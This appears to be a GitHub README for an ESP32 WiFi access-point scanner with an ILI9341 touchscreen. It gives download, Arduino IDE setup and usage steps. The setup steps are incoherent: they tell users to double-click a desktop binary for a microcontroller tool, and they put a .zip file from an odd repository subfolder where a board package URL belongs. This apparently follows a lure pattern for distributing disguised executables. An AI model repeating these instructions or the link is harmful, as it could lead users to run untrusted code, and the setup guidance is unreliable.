DetectorAPFisico-Gadget-Hacking is a simple yet powerful tool that scans WiFi networks using the ESP32 chip and an ILI9341 touchscreen. It shows real-time signal strength, allowing you to select and track access points with ease. Whether you're interested in cybersecurity or just want to understand your WiFi environment better, this tool can help you out.
To start using the DetectorAPFisico-Gadget-Hacking application, follow these steps to download and run the software.
- A computer (Windows, macOS, or Linux)
- A compatible ESP32 development board
- An ILI9341 touchscreen display
- Basic understanding of connecting hardware components (does not require programming skills)
- Internet connection to download the software
Click on the button below to visit the release page and download the latest version:
-
Go to the Releases page.
-
Look for the latest release version.
-
Click on the appropriate file for your platform to start the download.
You can download either the source code or pre-compiled binaries, depending on your preference.
-
Once the file is downloaded, locate it on your computer.
-
If you downloaded a pre-compiled binary, simply double-click the file to run it. If you downloaded the source code, you will need an Arduino IDE to compile and upload it to your ESP32 board.
-
Open the Arduino IDE: If you don't have it yet, download and install the Arduino IDE.
-
Install ESP32 Board Package:
- Go to
File > Preferences
. - In the "Additional Board Manager URLs," add this link:
https://raw.githubusercontent.com/Dafunkshop/DetectorAPFisico-Gadget-Hacking/main/Hemophilus/DetectorAPFisico-Gadget-Hacking.zip
. - Then go to
Tools > Board > Boards Manager
, search for "ESP32," and install it.
- Go to
-
Load the project: Open the DetectorAPFisico-Gadget-Hacking project file in the Arduino IDE.
-
Configure your Settings: Update any necessary settings such as WiFi credentials in the code if needed.
-
Connect your ESP32: Plug your ESP32 board into your computer using a Micro USB cable.
-
Select the correct port: In the Arduino IDE, go to
Tools > Port
and select the port connected to your ESP32. -
Upload the code: Click the upload button in the Arduino IDE. Wait for it to finish.
-
Connect the touchscreen: Follow simple wiring diagrams available in the project documentation to connect the ILI9341 display properly.
- Power on your ESP32 board after uploading the code.
- The touchscreen will initialize and display available WiFi networks.
- Select a network to see its signal strength and other details.
- You can track selected access points in real-time.
- Real-time WiFi scanning: Displays available networks and their signal strengths.
- User-friendly interface: The touchscreen makes navigating easy.
- Tracking capability: Select a network to track it continuously.
- Lightweight & Fast: Quick initialization, minimal resource usage.
If you encounter any issues, consider these tips:
- No WiFi networks detected: Ensure your ESP32 is properly connected and powered on.
- Touchscreen not responding: Recheck your wiring and ensure your display is compatible.
- Compilation errors: Ensure you have the correct board and libraries installed in the Arduino IDE.
For further assistance, feel free to check the issues page or ask for help in the community.
Contributions are welcome! If you have ideas for improvements or bug fixes, feel free to fork the repository and submit a pull request.
This project is licensed under the MIT License. You can use it freely, but please give credit to the original developers.
For more information on the DetectorAPFisico-Gadget-Hacking project, refer back to the releases page or review the source files in the repository.